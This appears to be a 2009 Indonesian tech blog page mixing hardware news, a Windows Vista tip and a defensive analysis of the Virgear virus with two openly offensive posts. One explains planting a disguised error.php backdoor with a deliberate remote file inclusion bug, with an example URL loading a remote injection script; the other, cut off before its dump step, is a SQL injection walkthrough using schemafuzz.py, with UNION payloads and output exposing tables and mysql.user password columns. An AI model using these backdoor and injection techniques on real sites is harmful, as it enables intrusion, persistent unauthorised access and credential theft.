Pages

27 Januari 2009

Edifier S750 Gaming Sound


Bagi para gamer sejati yang slalu duduk didepan kompi, pasti ingin mendengar suara game yg dimainkan meledak dan menggelegar dengan dahsyatnya. Edifier S750 adalah pilihan yang tepat untuk kebutuhan tersebut. karena memnag dapat membuat jantung bergetar mendengarnya. Ini dikarenakan power yang dimiliki S750 ini sangat mumpuni.

SPECIFICATIONS
- Power output: RMS 5 x 75W + 180W (THD=10%)
- System under developing FEATURES
- Heavy metal 5.1 speaker system with 10 inch subwoofer
- Dolby Digital & Prologic II inside
- Wooden MDF housing for all speakers
- Passive radiator on both sides on the subwoofer to exaggerate bass performance
- Magnetically shielded drivers for all speakers
- Switchable analog/digital input ports for most kinds of audio source
- Multifunctional wire controller with 2.5 inch LCD display (dimmer included)
- Headphone output on wired remote controller
- Master volume controls both speaker output and headphone output
- Volume booster for extra power output
- Separate bass and treble adjustments
- Multifunctional wireless remote controller included

Gimana ?? tertarik ???
Read rest of entry

Membuat Control Panel Sendiri


BUAT FOLDER

Untuk membuat “Control Panel” sendiri, pertama kita buat sebuah folder. Klik kanan tombol Start dan kemudian pilih Explore. Ketika folder Start Menu tampil, klik ganda folder Programs. Ketika folder Programs tampil, klik menu Organize pada toolbar Windows Explorer dan kemudian pilih New Folder. Selanjutnya, beri nama folder tersebut My Control Panel atau apa pun yang Anda suka.

GANTI ICON FOLDER

Sekarang, klik kanan folder My Control Panel, dan kemudian pilih Properties. Pilih tab Customize, dan kliktombol Change Icon pada panel Folder icons. Ketika kotakdialog Change Icon tampil, pilih icon untuk membedakan foldetersebut dari semua folder lainnya pada menu Start.

SERET FOLDER KE MENU START

Sekarang, seret folder My Control Panel dari folder Pro-grams dan arahkan ke tombol Start. Ketika menu Start terbuka, seret folder My Control Panel dan jatuhkan ke bagian paling atas menu Start. Sampai di sini, Anda bisa memasukkan tools ke “Control Panel”.

MASUKKAN TOOL (1)

Untuk memasukkan tools ke “Control Panel”, buka folder My Control Panel dari menu Start. Selanjutnya, buka Control Panel yang asli dan pilih Classic View. Sekarang, seret dan jatuhkan tools yang paling sering Anda gunakan dari Control Panel yang asli ke folder My Control Panel. Biasanya membuat shortcut dengan cara drag-and-drop sudah mencukupi. Namun seperti yang Anda ketahui, banyak tools yang terdapat di dalam tool lain. Sebagai contoh, untuk ke Display Settings, Anda harus membuka Personalization dulu.

MASUKKAN TOOL (2)

Untungnya beberapa shortcut command line tools lama masih eksis di Windows Vista dan Anda bisa meng-gunakannya. Tools Control Panel Windows Vista bisa ditemukan di folder Windows\System32 (dalam file CPL). Anda bisa menjalankannya dengan menggunakan format perintah: control tool.cpl di mana tool adalah tool Control Panel. Jika tool tersebut mempunyai beberapa tab, Anda bisa membuat shortcut langsung ke tab yang dituju dengan menggunakan format perintah: control tool.cpl,,# di mana # adalah nomor tab yang dituju. Beberapa shortcut command line bisa Anda lihat pada boks.

GANTI NAMA SHORTCUT

Ketika menyeret tools, Windows Vista akan membuat shortcut ke tools tersebut. Windows Vista akan menambahkan “- Shortcut” ke setiap nama tools. Tentu saja, Anda bisa menghapus tambahan tersebut dan mengganti nama sesuai yang diinginkan. Ketika sudah selesai, tutup folder My Control Panel dan Control Panel yang asli. Sekarang ketika Anda ingin menjalankan tools yang sering digunakan, cukup klik tombol Start dan pilih icon My Control Panel.

SHORTCUT COMMAND LINE CONTROL PANEL

  • Kategori Personalization: tab Display Settings (desk.cpl), Desktop Icon Settings (control desk.cpl,,0), Screen Saver Set-tings (desk.cpl,,1), dan Appearance Settings (desk.cpl,,2).
  • Ketegori System Properties: tab Computer Name (sysdm. cpl), Hardware (sysdm.cpl,,2), Advanced (sysdm.cpl,,3), System Protection (sysdm.cpl,,4), dan Remote (sysdm.cpl,,5)
  • Kategori Internet Properties: tab General (inetcpl.cpl), Security (inetcpl.cpl,,1), Privacy (inetcpl.cpl,,2), Content (inetcpl. cpl,,3), Connections (inetcpl.cpl,,4), Programs (inetcpl.cpl,,5), dan Advanced (inetcpl.cpl,,6).
  • Kategori Mouse Properties: tab Buttons (main.cpl), Pointers (main.cpl,,1), Pointer Options (main.cpl,,2), Wheel (main.cpl,,3), dan Hardware (main.cpl,,4).
  • Kategori Regional and Language Options: tab Formats (intl.cpl), Location (intl.cpl,,1), Keyboards and Languages (intl. cpl,,2), dan Administrative (intl.cpl,,3).
  • Kategori Sound: tab Playback (mmsys.cpl), Recording (mmsys.cpl,,1), dan Sounds (mmsys.cpl,,2).
  • Read rest of entry

    PSU : TAGAN TG500-BZ


    TAGAN TECHNOLOGY CO. yang cukup terkenal dengan produk casing high-end-nya, mencoba memberikan pilihan produk PSU (Power Supply Unit) untuk pasar Indonesia. Tagan TG500-BZ, produk ini disebut dengan PipeRock series. Sesuai namanya, PSU ini memiliki daya 500W. Tidak ada pengontrol apapun yang disertakan dalam produk ini untuk hanya sekadar mengetahui kinerja dari produk tersebut. PSU ini mampu mengakomodasi sebuah komputer yang memerlukan daya mencapai 500W.

    Desainnya memang cukup unik. Dengan warna hitam dan berbahan solid SECC Steel memang menunjukkan PSU ini sangat powerful. Pendinginan dari PSU ini dipercayakan dengan sebuah fan saja yang berukuran 13,5 cm. Yang membuat produk ini unik adalah adanya fitur yang disebut dengan PipeRock Cable Management, di mana terdapat beberapa konektor yang bisa dihubungkan dengan kabel secara terpisah, berbeda denga PSU kebanyakan yang seluruh kabelnya berasal dari satu buah lubang. Sehingga dengan begitu, Anda bisa mengatur sendiri berapa kebutuhan kabel yang Anda perlukan untuk perangkat di dalam PC Anda.

    Fluktuasi daya yang dialami oleh masing-masing rail tidak terlalu signifikan. Baik itu rail tegangan +3.3V, +5V maupun +12V tidak mengalami penurunan daya yang cukup banyak. Penurunan tegangan masih di bawah +/- 5% dari nilai semestinya masing-masing rail. Hal ini masih dianggap wajar dan tidak terlalu mengganggu.

    Yang paling menarik adalah paket penjualan yang diberikan, total ada dua tas terpisah yang dikemas dalam sebuah packaging yang cukup kokoh. Satu tas berisi perangkat kabel-kabel berwarna-warni yang menunjukkan masing-masing fungsinya. Terdapat total lima kabel yang siap dipasang dalam PSU tersebut. Tas yang ke-2 berisi unit PSU-nya di mana pada PSU tersebut ada beberapa konektor untuk menyambung ke kabel yang terpisah tersebut. Ditambah dengan kabel ground yang juga sudah terintegrasi di dalam PSU tersebut.–APHJ

    PRODUK / DATA TEST

    PRODUK / HARGA

    Tagan TG500-BZ / Rp1.075.000 (kisaran)

    Manufactur

    Kontak

    Website

    Tagan Technology Co.

    Techno Solution / (021) 62304380

    www.tagan.com

    DATA TEKNIS / PERLENGKAPAN

    Power Rating

    ATX Version

    PFC

    Input Frequency Range

    AC Input

    DC Output

    Jumlah / Ukuran Fan

    Manajemen Fan

    Berat

    Fitur Tambahan

    Paket Penjualan

    500 Watt

    12V/V 2.2

    Active

    50~60Hz

    100-240Vac 10-6A

    +3.3V 24 Amperes

    +5V 24 Amperes

    +12V1 20 Amperes

    +12V2 20 Amperes

    -12V 0.8 Amperes

    +5V (standby) 3 Amperes

    1 / 135mm

    -

    2,88kg

    -

    User Manual, Tas terpisah berisi: Kabel Power, kabe

    input terpisah, obeng, sekrup, cable ties, sarung

    tangan.

    PLUS / MINUS

    + Performa cukup baik dan stabil, konektor berlimpah, fitur active PFC.

    - Harga tinggi.

    Read rest of entry

    Virus VIRGEAR " si Penghapus MP3"



    WAH, ada lagu Agnes Monica yang “Matahariku””, sahutDencu. Karena itu lagu kesenangannya, tanpa ragu ia punlangsung menjalankannya dengan cara mengklik ganda filetersebut. Namun apa yang terjadi, bukan lagu Agnes yang iadapatkan, tapi semua file MP3 beserta file video kesayangan miliknya hilang dalam sekejap. Kok bisa? Itu salah satu tandanya telah terinfeksi oleh Virgear.

    Tipuan Virgear

    Virgear memang virus biasa saja, artinya ia tidak memiliki teknikinfeksi yang kompleks seperti halnya yang dilakukan virus lama Brontok maupun Maxtrox yang baru–baru ini menyebar.

    Virgear dibuat menggunakan Visual Basic. Sampai tulisan ini dibuat, terdapat tiga varian dari Virgear yang kami dapat. Varian pertama yang kami temukan memiliki ukuran fi le sebesar 16.896 bytes, yang kemungkinan besar di-pack menggunakan UPX dan di-scramble untuk menyembunyikan identitas dari packer yang digunakan. Yang kedua, memiliki ukuran fi le sebesar 49.152 bytes, murni tanpa di-pack. Dan yang ketiga, atau Virgear.C, memiliki ukuran sebesar 19.968, yang juga kemungkinan besar di-pack menggunakan UPX dan di-scramble seperti halnya varian pertama.

    Yang akan coba dibahas kali ini adalah varian Virgear.A. Walaupun sebenarnya perbedaan dari setiap varian tidaklah terlalu signifikan, hanya di nama–nama fi le virus yang digunakan untuk menyebar. Dan satu hal yang tidak berubah antara varian yang satu dengan yang lainnya adalah icon yang digunakan. Ia menggunakan icon yang mirip dengan file .MP3 milik aplikasi WinAmp. Yang dilakukannya ini cukup banyak menipu para korbannya. Walaupun sebenarnya hal ini tidak perlu terjadi, jika Anda mampu membedakannya antara file asli dan file virus.

    Bersarang di System

    Ia akan meng-copy-kan beberapa file yang merupakan duplikat dari dirinya ke direktori yang ia beri nama system. Direktori ini terletak di bawah direktori System32 milik Windows. Pada direktori tersebut akan terdapat beberapa file dengan nama VirGear.exe, smss.exe, Gazette.exe, Gazerock.exe, dan Nugen. exe. Direktori system dan kelima file tersebut ber-attribut hidden dan system, jadi secara setting-an default Windows tidak akan terlihat oleh kasat mata. Lalu, kelima file itu akan ia jalankan.

    Untuk dapat aktif otomatis, ia membuat beberapa item baru di Registry Run dengan nama seperti Winamps, Nullsoft, JetAduio, CoolEditV2, dan AdobeAudition. Nama yang dibuat memang terlihat mirip dengan nama beberapa aplikasi multimedia. Tentu saja ini bertujuan untuk tidak membuat user curiga.

    Saat user menjalankan file virus, ia akan mencoba untuk membuka file Clock.avi yang secara default terletak pada direktoriWindows untuk dijalankan pada Windows Media Player. Pada rutin virusnya terlihat bahwa fungsi ini akan diaktifkan apabila virus dijalankan bukan pada direktori induknya, yakni system.

    Matikan UAC

    Untuk melancarkan aksinya ia mengeset registry untuk tidak menampilkan file hidden dan system, serta menyembunyikan setiap extension yang dikenali oleh Windows. Selain itu, fungsi windows lainnya seperti System Restore dan Find/Search juga ia disable. Serta, ia pun mencoba untuk mematikan UAC (User Account Control) yang ada pada Windows Vista. Walaupun sebenarnya, virus ini tidak dapat berjalan mulus di Vista pada user account selain administrator, tentu saja karena terbentur masalah privilages yang lebih ketat dibandingkan operating system sebelumnya, terkecuali memang Anda dengan sengaja menjalankan dengan perintah “Run as administrator”.

    Matikan Virus Lain

    Untuk menjadi penguasa tunggal di komputer terinfeksi, ia mencoba untuk mematikan virus lain dengan memasukkan nama file yang dikenal sebagai nama file induk virus tersebut pada Registry Image File Execution Options, seperti kspoold. exe, HokageFile.exe, atau HOKAGE4.exe. Selain itu, ia pun menambahkan beberapa nama file lain seperti Setup.exe, In-stall.exe, msiexec.exe, regedit.exe, dan juga nama file antivirus termasuk PCMAV-CLN.exe dan PCMAV-RTP.exe.

    Selain itu, virus ini juga menghalau user untuk masuk dalam modus safe-mode, dengan menghapus setingan yang berkaitan ini di Registry.

    Timer Penyebaran

    Virus ini memiliki komponen Timer. Salah satunya komponen Timer yang ia namakan Penyebaran. Timer ini diset untuk memiliki interval sebesar 60000ms. Ia bertugas untuk membuat file induk dan menyebarkan diri ke setiap drive yang ia temukan, termasuk Remote Drive. Artinya, ia juga dapat menyerang drive yang di share pada jaringan setempat.

    Pada saat menyerang removable drive ataupun remote drive, ia akan menciptakan dua buah fi le baru dengan nama Autorun.inf dan Winamps.exe dengan attribut hidden dan system. Selain itu, sebuah direktori baru dengan nama My Music 2008 juga akan diciptakan, pada direktori tersebut akan berisi banyak sekali file MP3 palsu yang sebenarnya merupakan virus itu sendiri. Nama yang ia gunakan seperti Agnes_Monica_-_Mataha-riku__Ost._Jelita_.mp3 ,.exe, Dewiq_feat_Kaka_-_BeTe.mp3,.exe, dan masih banyak lagi yang lainnya. Dan nama – nama ini yang selalu di-update di setiap varian barunya.

    Jika Anda lebih teliti, terdapat beberapa kejanggalan pada nama file tersebut. Contohnya pada virus ini, terdapat tanda titik setelah ekstensi, misalkan “Agnes Monica.mp3.”. Tanda titik tersebut mengisyaratkan bahwa sebenarnya terdapat extension asli dibelakang extension tersebut. Secara default Windows, extension asli ini tidak akan diperlihatkan, apalagi virus ini pun juga mengeset Windows untuk tidak menampilkan extension asli. Selanjutnya, Anda ubah tampilan Windows Explorer ke modus Details (View -> Details), di bagian Type akan terlihat tipedari file tersebut. File MP3 yang asli memiliki Type contohnya seperti “MPEG Layer 3 Audio File”, “MP3 Format Sound”, atau sejenisnya. Jika Type nya adalah Application, bisa dipastikan itu adalah virus. Selain itu, lihat juga tampilan dari fi le tersebut. Apabila file yang Anda curigai memiliki jumlah spasi yang sangat banyak terutama di bagian akhir, Anda juga harus waspada, karena bisa jadi diakhir spasi yang segitu banyak terdapat extension asli virus yang sebenarnya, misalkan seperti yang dilakukan oleh virus ini “Dewiq_feat_Kaka_-_BeTe.mp3 [%spasi yang sangat banyak%] ,.exe”. Terlihat bahwa extension asli file tersebut adalah EXE (executable) dan bukanlah MP3. Maka dari itu, lebih baik setting-lah Windows Explorer Anda dengan masuk ke menu Folder Options, lalu memilih “Show hidden files and folders”, serta menghapus centangan ([1]) pada “Hide extensions for known fi le types” dan “Hide protected operating system fi les (Recommended)”.

    Cari dan Hapus!

    Beberapa pembaca mengaku bahwa saat melakukan pembasmian menggunakan PCMAV, ia menghapus setiap file MP3 yang telah terinfeksi oleh virus ini. Padahal kenyataan sebenarnya adalah virus ini tidak menginfeksi atau lebih tepatnya menginjeksi masuk ke dalam file MP3 tersebut. Yang ia lakukan adalah mencari ke setiap penjuru drive akan keberadaan file MP3, jika ia menemukannya, maka akan langsung ia hapus dan digantikan dengan file virus dengan nama yang hampir mirip dengan nama file aslinya. Jadi, file MP3 Anda yang asli memang benar–benar dihapus oleh virus ini tanpa ampun. Dan sedihnya lagi, hal ini tidak ia lakukan hanya pada fi le MP3 saja, melainkan juga pada file .3GP, .AVI, .RM, .WMV, .ASF, .MPG, .MPEG, dan .MP4.

    Basmi Virgear!

    Silakan gunakan PCMAV yang telah disempurnakan ini. Dan dikarenakan virus ini dapat memblok PCMAV, Anda diharuskan merename terlebih dahulu file PCMAV-CLN.EXE sebelum digu-nakan, misalkan menjadi 123456.EXE ataupun nama lain dengan extension .EXE. Sementara untuk file yang telah terlanjur dihapus oleh virus ini, segeralah lakukan recovery.

    By : PC Media
    Read rest of entry

    Notebook Dua Layar Dari Lenovo

    Pasaran notebook semakin hari semakin ketat. Oleh karena itu, inovasi serta kreatifitas penting dilakukan oleh produsen notebook untuk bersaing memperebutkan hati konsumen. Lenovo, salah satu pemain veteran dalam dunia komputasi mobile sekali lagi meluncurkan salah satu produk notebook mereka dengan feature menarik.

    W700ds, seri notebook workstation terbaru dari Lenovo hadir dengan disain dua layar LCD monitor. Mobile workstation dari Lenovo ini ditujukan bagi para profesional di bidang kreasi digital content, fotografi, serta bidang disain grafis lainnya.

    Melihat banyaknya pengguna komputer desktop yang membutuhkan dua layar monitor dalam melakukan pekerjaanya, Lenovo berinisiatif meluncurkan disain dua layar pada notebooknya. Hal ini diambil untuk mengakomodasi pengguna yang membutuhkan fungsionalitas dua layar pada media bergerak seperti notebook. Fungsi-fungsi unik dari mobile workstation Lenovo seperti color calibrator, serta tambahan digitizer (opsional) juga menambah fungsinya sebagai media kreasi digital content yang mobile.

    Image

    W700ds dilengkapi dengan dengan dua layar monitor LCD. Layar pertama sebesar 17-inci menjadi layar utama dalam beraktivitas. Layar kedua berupa LCD sebesar 10,6 inci menjadi layar tambahan yang difungsikan untuk memperluas bidang penglihatan. Layar kedua terletak tepat di belakang layar pertama. Untuk menggunakannya, Anda tinggal menarik layar tersebut ke samping kanan. Komposisi dua layar ini menambah ketebalan beberapa milimeter pada rancang –bangun notebook tersebut. Menurut Lenovo, intensitas cahaya (brightness) dari kedua layar ini lebih baik dari seri-seri notebook Lenovo sebelumnya.

    Spesifikasi:

    • Intel's Quad-Core ataupun Extreme Processors, dengan 8GB DDR3 RAM
    • NVIDIA Quadro FX mobile graphics
    • Dual hard drives (dengan konfigurasi RAID) dan kapasitas hingga 960GB HDD dengan pilihan SSD
    • DVD burner dan high speed UDMA compact Flash Reader,
    • Mendukung koneksi Dual Link DVI, Display Port, VGA,
    • 7-in-1 multicard reader, five USB ports, serta dukungan untuk WiMAX,
    • fingerprint reader, a smartcard reader and hard-disk dengan feature enkripsi lengkap

    Harga dan ketersediaan mobile workstation ThinkPad W700ds akan diinformasikan lebih lanjut.
    Read rest of entry

    SD Card 2 Terrabyte !!!

    Secure Digital Association mengumumkan sebuah standar baru untuk SD card. Secure Digital Extended Capacity (SDXC) adalah format terkini yang mampu memiliki kapasitas hingga 2 Terrabyte (2.000 GB).

    Image
    SDXC
    Dalam pagelaran CES 2009 awal Januari ini, Secure Digital Association mengumumkan standar SD card terbaru yaitu SDXC. Setelah berulang-kali meningkatkan standar SD card (SD card, penambahan SDIO, dan SDHC), asosiasi ini mencanangkan standar dengan limitasi yang teramat tinggi. Rencananya, SDXC akan segera beredar di tahun 2009 ini untuk menembus batasan 32 GB pada SDHC. Kecepatannya dalam tahun 2009 ini dapat mencapai 104 MB/s. Sebagai catatan, SDHC class 6 hanya berkisar 6 MB/s. Rencananya, SDXC ini bahkan akan dapat mencapai kecepatan 300 MB/s. SDXC ini menggunakan Microsoft exFAT file system untuk dapat menggunakan kapasitas yang teramat besar. Jadi, bagi Anda yang hendak membeli perangkat yang memakai SD-card di pertengahan tahun nanti, pastikan perangkat tersebut sudah mendukung SDXC.

    By : sdcard.org
    Read rest of entry

    NVIDIA CUDA


    Ini adalah kampanye NVIDIA yang cukup menggelitik. Bukan, graphics plus tidak berarti bahwa NVIDIA menggembar-gemborkan kemampuan grafis yang hebat. Akan tetapi, kampanye ini menampilkan kemampuan GPU NVIDIA untuk mengerjakan pekerjaan di luar grafik. NVIDIA tampaknya cukup sadar bahwa graphics card saat ini sudah mulai kehilangan pamornya sebagai sarana bermain game saja. Perlu dicarikan jalan keluar agar pangsa pasar graphics card tidak terkunci pada gamer PC saja.CUDA (Compute Unified Device Architecture) adalah kata kuncinya. Sebuah GPU NVIDIA yang dilengkapi CUDA akan membuat graphics card tersebut berubah menjadi lebih dari sekadar pemroses grafik saja. CUDA adalah arsitektur parallel computing yang dikembangkan NVIDIA. Tujuannya sederhana, agar GPU dapat diakses oleh software dan dimanfaatkan sebagai sarana pemrosesan data yang bekerja secara paralel dengan prosesor.

    CUDA dapat dianggap sebagai middle-ware atau perantara. Aplikasi yang hendak memanfaatkan GPU NVIDIA, cukup mengakses CUDA saja. CUDA yang akan mengatur penggunaan GPU dan pemanfaatan resource-nya. Pada software yang dibangun dengan C, hanya dibutuhkan sedikit modifikasi agar dapat memanfaatkan CUDA. Sementara itu, CUDA juga sudah dipersiapkan untuk kompatibel dengan DirectX 11 dan OpenCL.

    CUDA sudah ada di dalam driver terbaru. Hingga saat ini, CUDA dapat diaktifkan pada GPU NVIDIA seri 8, 9, dan Quadro. Jadi, CUDA bukan hardware atau aksesoris yang harus dibeli secara terpisah. Singkat kata, CUDA tersedia secara gratis untuk para pengguna GPU NVIDIA terkini.
    Read rest of entry

    KINGSTON SSD

    Solid State Drive (SSD) adalah teknologi yang sangat dinantikan untuk menggantikan hard disk. Kali ini, Kingston menghadirkan SSD-nya, yaitu SSDNow seri E dan M. Uniknya, SSD Kingston ini menggunakan basis SSD Intel.

    Image
    Kingston SSDNow Seri E

    SSD produk Intel adalah produk SSD pertama yang mencengangkan CHIP saat hadir di CHIP Test-Center. Kali ini, Kingston menghadirkan teknologi serupa dalam balutan nama Kingston SSDNow.

    Kingston SSDNow seri M dan E hadir dalam dua kapasitas: 32 GB dan 80 GB. Memang belum mengagumkan, akan tetapi merupakan awal yang baik. Kecepatan tulis adalah yang membedakan kedua seri ini. Seri E adalah yang lebih cepat dengan kecepatan tulis 170 MB/s. Seri M seharusnya merupakan yang lebih ekonomis dengan menawarkan kecepatan tulis 70 MB/s. Uniknya, kedua jenis Kingston SSDNow ini memiliki kecepatan baca yang sama, 250 MB/s.

    Image
    Kingston SSDNow Seri M

    SSD dari Kingston menggunakan standar interface SATA harddisk drive. Akan tetapi, sebagaimana laykanya SSD, SSDNow ini sangat tangguh dan anti-benturan serta mampu bekerja dalam lingkungan yang ekstrim. Hal ini dimungkinkan karena tidak ada bagian yang dapat bergerak. SSDNow Kingston seri E dan M dilengkapi dengan S.M.A.R.T (Self-Monitoring, Analysis and Reporting Technology) untuk memantau integritas dan kehandalan drive. Drive ini didukung oleh garansi tiga tahun dan dukungan teknis gratis.


    By : CHIP

    Read rest of entry

    Simple PHP Bacdoor

    nah gini nich...

    okeh langsung ajah

    kalo pas dapet target RFI naluri temen-temen pasti yang pertama langsung pasang backdoor

    dan patch bugnya.

    kalo ngga langsung buru-buru ke /tmp trus utak atik di situ :p

    trik untuk menghidari mafia tukang patch bug dan tukang delete backdoor orang

    yang kita singkat namanya menjadi (MTPBDTDBO)

    xixixxi chain_loader banget :p


    nah jadi kepikiran kalo bugnya di patch kan jadi ngga bisa masuk lagi

    kenapa ngga bikin bug aja sendiri :p


    dengan asumsi para MTPBDTDBO tadi selalu memperhatikan ukuran file dan nama file yang mencurigakan


    langsung aja pas giliran kita dapet kesempatan upload atau cread file

    langsung bikin nama file yang ngga mencurigakan misal

    error.php atau terserah kalian lah yang kira-kira menurut kalian nagga mencurigakan

    kita contohkan dengan error.php

    nah kita isi filenya dengan bug RFI



    nah kan kita sekarang punya file backdoor dengan ukuran yang tidak mencolok alias sangat kecil

    cara pakainya seperti inject RFI seperti biasa


    error.php?error= <<>

    misal:

    http://kecemplungkalen.co.cc/error.php?error=http://webtempat.in/inject_kamu.txt???


    dan kita ahirnya punya backdoor yang ngga mencurigakan dan semoga awet sampai anak cucu kita


    pesan buat mafia tukang patch bug dan tukang delet backdoor orang (MTPBDTDBO)

    sadarlah kalian wahai tukang delete backdor orang

    By : Jasakom

    Read rest of entry

    Tutorial SQL Injection Dengan Menggunakan Schemafuzz.py

    Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de

    tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.

    ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut


    pertama-tama kita cari target dengan google dan ditemukan:

    misalnya

    http://127.0.0.1/site/phpweb/forum.php?forum=1


    sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

    caranya seperti ini ./schemafuzz.py -h help

    kita temukan sebagian perintahnya seperti ini

    --schema, --dbs, --dump, --fuzz, --info, --full, --findcol


    langkah pertama

    ----------------

    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol

    diperoleh seperti ini

    [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--

    [+] Evasion Used: "+" "--"

    [+] 01:32:04

    [+] Proxy Not Given

    [+] Attempting To find the number of columns...

    [+] Testing: 0,1,2,3,4,5,

    [+] Column Length is: 6

    [+] Found null column at column #: 1

    [+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--

    [+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

    [-] Done!


    langkah kedua

    --------------

    setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini


    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz

    diperoleh seperti ini

    [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

    [+] Evasion Used: "+" "--"

    [+] 01:37:09

    [+] Proxy Not Given

    [+] Gathering MySQL Server Configuration...

    Database: webthings

    User: testing@localhost

    Version: 5.0.51a

    [+] Number of tables names to be fuzzed: 354

    [+] Number of column names to be fuzzed: 263

    [+] Searching for tables and columns...


    [+] Found a table called: mysql.user


    [+] Now searching for columns inside table "mysql.user"

    [!] Found a column called:user

    [!] Found a column called:password

    [-] Done searching inside table "mysql.user" for columns!


    [-] [01:37:48]

    [-] Total URL Requests 618

    [-] Done


    langkah ketiga

    ---------------

    Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya


    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya

    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings


    [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

    [+] Evasion Used: "+" "--"

    [+] 01:43:11

    [+] Proxy Not Given

    [+] Gathering MySQL Server Configuration...

    Database: webthings

    User: testing@localhost

    Version: 5.0.51a

    [+] Showing Tables & Columns from database "webthings"

    [+] Number of Tables: 33


    [Database]: webthings

    [Table: Columns]

    [0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

    [1]wt_articles_title: article_id,category,title,active,date,userid,views

    [2]wt_articlescat: cod,category

    [3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

    [4]wt_banners_log: banner,date,views,clicks,sessions

    [5]wt_banners_rawlog: banner,type,date,session

    [6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

    [7]wt_comments: cod,type,link,date,userid,comment

    [8]wt_config: id,config

    [9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text

    [10]wt_downloadscat: cod,ref,name,descr

    [11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

    [12]wt_faq_topics: cod,name

    [13]wt_forum_log_topics: uid,msgid,logtime,notifysent

    [14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

    [15]wt_forums: cod,title,descr,locked,notifies,register

    [16]wt_forums_mod: forum,userid,type

    [17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

    [18]wt_links: id,category,active,name,url,count,descr,obs

    [19]wt_linkscat: cod,name,descr,parent_id

    [20]wt_menu: id,pos,title,url,type,newwindow,lang

    [21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

    [22]wt_newscat: cod,name,image

    [23]wt_online: id,time,uid

    [24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

    [25]wt_picofdaycat: id,name,description

    [26]wt_picofdaysel: date,picture_id,views,clicks

    [27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

    [28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

    [29]wt_user_access: userid,module

    [30]wt_user_book: userid,cod_user

    [31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

    [32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,

    newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail


    [-] [01:43:48]

    [-] Total URL Requests 270

    [-] Done


    untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini


    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info

    maka akan tampil seperti ini


    [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

    [+] Evasion Used: "+" "--"

    [+] 01:46:51

    [+] Proxy Not Given

    [+] Gathering MySQL Server Configuration...

    Database: webthings

    User: testing@localhost

    Version: 5.0.51a


    [+] Do we have Access to MySQL Database: Yes <-- w00t w00t

    [!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--


    [+] Do we have Access to Load_File: No


    [-] [01:46:51]

    [-] Total URL Requests 3

    [-] Done


    ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe


    untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini


    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs

    akan tampil seperti ini


    [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

    [+] Evasion Used: "+" "--"

    [+] 01:58:15

    [+] Proxy Not Given

    [+] Gathering MySQL Server Configuration...

    Database: webthings

    User: testing@localhost

    Version: 5.0.51a

    [+] Showing all databases current user has access too!

    [+] Number of Databases: 1


    [0]webthings


    [-] [01:58:17]

    [-] Total URL Requests 30

    [-] Done


    langkah selanjutnya

    --------------------


    cara untuk menemukan user dan password

    kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom

    setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini

